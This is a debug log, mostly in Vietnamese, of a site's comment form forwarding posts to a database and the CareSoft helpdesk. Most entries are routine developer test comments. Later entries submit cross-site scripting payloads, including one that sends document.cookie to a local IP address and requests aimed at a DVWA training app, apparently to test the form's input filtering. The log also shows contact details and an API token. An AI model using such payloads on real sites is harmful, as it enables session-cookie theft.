-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"Haha","phone":"0934607555","mail":"admin@ducdoblog.com.vn","content":"Alo, em \u00e0 ... nh\u1edb anh ko ?","parent":"0","ip":"210.245.33.4","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #118","username":"Haha","ticket_comment":"#118\n Alo, em \u00e0 ... nh\u1edb anh ko ?<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.vn","phone":"0934607555","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 07:22:37","ticket_subject":"Test Com #118","ticket_no":75269,"created_at":"2019-05-18 07:22:37","ticket_id":107151}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107151","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"L\u00eau l\u00eau","phone":"0934567456","mail":"A@vn.vn","content":"Kh\u1ed1ng nh\u1edb .... l\u00e0m g\u00ec nhau","parent":"118","ip":"210.245.33.4","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #119","username":"L\u00eau l\u00eau","ticket_comment":{"body":"#119\n Kh\u1ed1ng nh\u1edb .... l\u00e0m g\u00ec nhau<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"A@vn.vn","ticket_status":"open","phone":"0934567456","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 07:24:31","ticket_subject":"Test Com #119","ticket_no":75269,"created_at":"2019-05-18 07:22:38","ticket_id":107151}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107151","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"Ch\u00f3","phone":"0946482727","mail":"A.c@gmail.com","content":"H\u00ea h\u00ea h\u00ea h\u00ea","parent":"118","ip":"210.245.33.4","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #120","username":"Ch\u00f3","ticket_comment":{"body":"#120\n H\u00ea h\u00ea h\u00ea h\u00ea<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"A.c@gmail.com","ticket_status":"open","phone":"0946482727","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 07:25:37","ticket_subject":"Test Com #120","ticket_no":75269,"created_at":"2019-05-18 07:22:38","ticket_id":107151}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0934640504","mail":"admin@ducdoblog.com.co","content":"\u0111\u00e3 fixed time comment !!!!<br \/>\r\n0934607056","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #121","username":"\u0110\u1ee9c","ticket_comment":"#121\n \u0111\u00e3 fixed time comment !!!!<br \/>\r\n0934607056<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.co","phone":"0934640504","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 09:05:02","ticket_subject":"Test Com #121","ticket_no":75270,"created_at":"2019-05-18 09:05:02","ticket_id":107152}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0934628495","mail":"A@co.com","content":"Abccccccccccccccc","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #122","username":"\u0110\u1ee9c","ticket_comment":"#122\n Abccccccccccccccc<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"A@co.com","phone":"0934628495","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 09:13:59","ticket_subject":"Test Com #122","ticket_no":75271,"created_at":"2019-05-18 09:13:59","ticket_id":107153}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107153","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"Duc","phone":"0945374946","mail":"A@vn.co","content":"Tr\u1ea3 l\u1eddiiiiiii nhaaaaaaa","parent":"122","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #123","username":"Duc","ticket_comment":{"body":"#123\n Tr\u1ea3 l\u1eddiiiiiii nhaaaaaaa<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"A@vn.co","ticket_status":"open","phone":"0945374946","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 09:14:31","ticket_subject":"Test Com #123","ticket_no":75271,"created_at":"2019-05-18 09:13:59","ticket_id":107153}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0934658515","mail":"admin@ducdoblog.vn.coq","content":"ahiihihihihi test cache !!!!","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #124","username":"\u0110\u1ee9c","ticket_comment":"#124\n ahiihihihihi test cache !!!!<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.vn.coq","phone":"0934658515","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 10:12:37","ticket_subject":"Test Com #124","ticket_no":75272,"created_at":"2019-05-18 10:12:37","ticket_id":107154}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0947788947","mail":"a@d.com","content":"ahiihihihihi test cache l\u1ea7n 2 !!!!","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #125","username":"\u0110\u1ee9c","ticket_comment":"#125\n ahiihihihihi test cache l\u1ea7n 2 !!!!<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"a@d.com","phone":"0947788947","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 10:14:44","ticket_subject":"Test Com #125","ticket_no":75273,"created_at":"2019-05-18 10:14:44","ticket_id":107155}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0946655204","mail":"admin@ducdoblog.co.gs","content":"ahiihihihihi test cache l\u1ea7n 3 !!!!","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #126","username":"\u0110\u1ee9c","ticket_comment":"#126\n ahiihihihihi test cache l\u1ea7n 3 !!!!<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.co.gs","phone":"0946655204","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 11:04:11","ticket_subject":"Test Com #126","ticket_no":75274,"created_at":"2019-05-18 11:04:11","ticket_id":107156}}
--------------------
-------Database-----
Send post params: {"postID":"7439","author":"Qu\u1ea3n tr\u1ecb vi\u00ean","phone":"0","mail":"nnghia@gmail.com","content":"tr\u1ea3 l\u1eddi ph\u00e1t n\u00e8.<br\/><br\/>-Test cache l\u1ea7n 3<br\/>","parent":126,"ip":"210.245.26.17","ticket_id":107156,"status":"1","is_admin":1,"type":"post","ticketID":0}
--------------------
-------From CareSoft-----
DTV nhận: Token: t7MUbzWV03WvL-w - Body: {"agent_email":"nnghia@gmail.com","ticket_id":107156,"content":"@126\n tr\u1ea3 l\u1eddi ph\u00e1t n\u00e8.\n\n-Test cache l\u1ea7n 3","agent_name":"Qu\u1ea3n tr\u1ecb vi\u00ean"}
Result: Nhận thành công
-------------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107156","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0934757504","mail":"a.v@gmail.com","content":"Hello b\u1ea1n qu\u1ea3n tr\u1ecb vi\u00ean :)))","parent":"126","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #128","username":"\u0110\u1ee9c","ticket_comment":{"body":"#128\n Hello b\u1ea1n qu\u1ea3n tr\u1ecb vi\u00ean :)))<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"a.v@gmail.com","ticket_status":"open","phone":"0934757504","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 11:06:07","ticket_subject":"Test Com #128","ticket_no":75274,"created_at":"2019-05-18 11:04:11","ticket_id":107156}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107156","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c test","phone":"0934608798","mail":"admin@ducdoblog.com.vvv","content":"test min code !","parent":"126","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #129","username":"\u0110\u1ee9c test","ticket_comment":{"body":"#129\n test min code !<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.vvv","ticket_status":"open","phone":"0934608798","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 12:00:40","ticket_subject":"Test Com #129","ticket_no":75274,"created_at":"2019-05-18 11:04:11","ticket_id":107156}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"aaaa","phone":"0986332295","mail":"admin@ducdoblog.com.dd","content":"Test min code11111","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #130","username":"aaaa","ticket_comment":"#130\n Test min code11111<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.dd","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 12:01:13","ticket_subject":"Test Com #130","ticket_no":75277,"created_at":"2019-05-18 12:01:13","ticket_id":107159}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107154","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"aaaaa","phone":"0986332295","mail":"admin@ducdoblog.com.ddd","content":"test min code","parent":"124","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #131","username":"aaaaa","ticket_comment":{"body":"#131\n test min code<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.ddd","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 12:01:42","ticket_subject":"Test Com #131","ticket_no":75272,"created_at":"2019-05-18 10:12:38","ticket_id":107154}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107155","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.ddd","content":"tesstttttttt min code","parent":"125","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #132","username":"\u0110\u1ee9c","ticket_comment":{"body":"#132\n tesstttttttt min code<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.ddd","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 12:02:33","ticket_subject":"Test Com #132","ticket_no":75273,"created_at":"2019-05-18 10:14:45","ticket_id":107155}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107155","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.ddd","content":"tesstttttttt min code 2","parent":"125","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #133","username":"\u0110\u1ee9c","ticket_comment":{"body":"#133\n tesstttttttt min code 2<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.ddd","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 12:03:30","ticket_subject":"Test Com #133","ticket_no":75273,"created_at":"2019-05-18 10:14:45","ticket_id":107155}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107152","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.ddd","content":"tesstttttttt min code 3","parent":"121","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #134","username":"\u0110\u1ee9c","ticket_comment":{"body":"#134\n tesstttttttt min code 3<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.ddd","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 12:03:54","ticket_subject":"Test Com #134","ticket_no":75270,"created_at":"2019-05-18 09:05:02","ticket_id":107152}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107149","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"ssssssssssssssssssss","parent":"114","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #135","username":"\u0110\u1ee9c","ticket_comment":{"body":"#135\n ssssssssssssssssssss<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.cc","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 13:39:43","ticket_subject":"Test Com #135","ticket_no":75267,"created_at":"2019-05-17 23:15:24","ticket_id":107149}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107098","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"test ph\u00e1t n\u1eefa !","parent":"111","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #136","username":"\u0110\u1ee9c","ticket_comment":{"body":"#136\n test ph\u00e1t n\u1eefa !<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.cc","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 13:46:42","ticket_subject":"Test Com #136","ticket_no":75216,"created_at":"2019-05-17 16:49:32","ticket_id":107098}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107097","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"T\u00e9ttttttttttttttttttttttttttttttttttttttttt","parent":"110","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #137","username":"\u0110\u1ee9c","ticket_comment":{"body":"#137\n T\u00e9ttttttttttttttttttttttttttttttttttttttttt<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.cc","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 13:48:44","ticket_subject":"Test Com #137","ticket_no":75215,"created_at":"2019-05-17 16:33:27","ticket_id":107097}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107097","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"ti\u1ebfp nh\u00e9 !!!!!!","parent":"110","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #138","username":"\u0110\u1ee9c","ticket_comment":{"body":"#138\n ti\u1ebfp nh\u00e9 !!!!!!<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.cc","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 13:49:38","ticket_subject":"Test Com #138","ticket_no":75215,"created_at":"2019-05-17 16:33:27","ticket_id":107097}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"alert(document.cookie)","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #139","username":"\u0110\u1ee9c","ticket_comment":"#139\n alert(document.cookie)<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 14:07:07","ticket_subject":"Test Com #139","ticket_no":75279,"created_at":"2019-05-18 14:07:07","ticket_id":107161}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"alert(document.cookie)","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #140","username":"\u0110\u1ee9c","ticket_comment":"#140\n alert(document.cookie)<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 14:14:58","ticket_subject":"Test Com #140","ticket_no":75280,"created_at":"2019-05-18 14:14:58","ticket_id":107162}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"ssssssssssss function show(){alert();}","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #141","username":"\u0110\u1ee9c","ticket_comment":"#141\n ssssssssssss function show(){alert();}<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 14:18:11","ticket_subject":"Test Com #141","ticket_no":75281,"created_at":"2019-05-18 14:18:11","ticket_id":107163}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"\u0110\u1ee9c","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #142","username":"\u0110\u1ee9c","ticket_comment":"#142\n \u0110\u1ee9c<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 14:18:54","ticket_subject":"Test Com #142","ticket_no":75282,"created_at":"2019-05-18 14:18:54","ticket_id":107164}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107164","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"new Image().src=\"http:\/\/192.168.149.128\/bogus.php?output=\"+document.cookie;","parent":"142","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #143","username":"\u0110\u1ee9c","ticket_comment":{"body":"#143\n new Image().src=\"http:\/\/192.168.149.128\/bogus.php?output=\"+document.cookie;<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.cc","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 14:57:23","ticket_subject":"Test Com #143","ticket_no":75282,"created_at":"2019-05-18 14:18:55","ticket_id":107164}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"a<br \/>\r\nv<br \/>\r\ns<br \/>\r\nd<br \/>\r\nssssssssssssssss","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #144","username":"\u0110\u1ee9c","ticket_comment":"#144\n a<br \/>\r\nv<br \/>\r\ns<br \/>\r\nd<br \/>\r\nssssssssssssssss<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 14:58:02","ticket_subject":"Test Com #144","ticket_no":75283,"created_at":"2019-05-18 14:58:02","ticket_id":107165}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/<br \/>\r\na<br \/>\r\na","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #145","username":"\u0110\u1ee9c","ticket_comment":"#145\n https:\/\/demo.dienthoaivui.com.vn\/test-com\/<br \/>\r\na<br \/>\r\na<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 14:58:54","ticket_subject":"Test Com #145","ticket_no":75284,"created_at":"2019-05-18 14:58:54","ticket_id":107166}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"<br \/>\r\n\tvar xhr = new XMLHttpRequest();<br \/>\r\n\txhr.open('POST','http:\/\/localhost:81\/DVWA\/vulnerabilities\/xss_s\/',true);<br \/>\r\n\txhr.setRequestHeader('Content-type','application\/x-www-form-urlencoded');<br \/>\r\n\txhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');<br \/>","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #146","username":"\u0110\u1ee9c","ticket_comment":"#146\n <br \/>\r\n\tvar xhr = new XMLHttpRequest();<br \/>\r\n\txhr.open('POST','http:\/\/localhost:81\/DVWA\/vulnerabilities\/xss_s\/',true);<br \/>\r\n\txhr.setRequestHeader('Content-type','application\/x-www-form-urlencoded');<br \/>\r\n\txhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');<br \/><br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 15:01:51","ticket_subject":"Test Com #146","ticket_no":75285,"created_at":"2019-05-18 15:01:51","ticket_id":107167}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"http:\/\/testsite.test\/alert(\"TEST\");","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #147","username":"\u0110\u1ee9c","ticket_comment":"#147\n http:\/\/testsite.test\/alert(\"TEST\");<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 15:04:11","ticket_subject":"Test Com #147","ticket_no":75286,"created_at":"2019-05-18 15:04:11","ticket_id":107168}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"click me!<br \/>","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #148","username":"\u0110\u1ee9c","ticket_comment":"#148\n click me!<br \/><br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 15:06:59","ticket_subject":"Test Com #148","ticket_no":75287,"created_at":"2019-05-18 15:06:59","ticket_id":107169}}
--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":0,"page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"http:\/\/localhost:81\/DVWA\/vulnerabilities\/xss_r\/?name=alert(document.cookie)","parent":"0","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #149","username":"\u0110\u1ee9c","ticket_comment":"#149\n http:\/\/localhost:81\/DVWA\/vulnerabilities\/xss_r\/?name=alert(document.cookie)<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","email":"admin@ducdoblog.com.cc","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 15:14:45","ticket_subject":"Test Com #149","ticket_no":75288,"created_at":"2019-05-18 15:14:45","ticket_id":107170}}
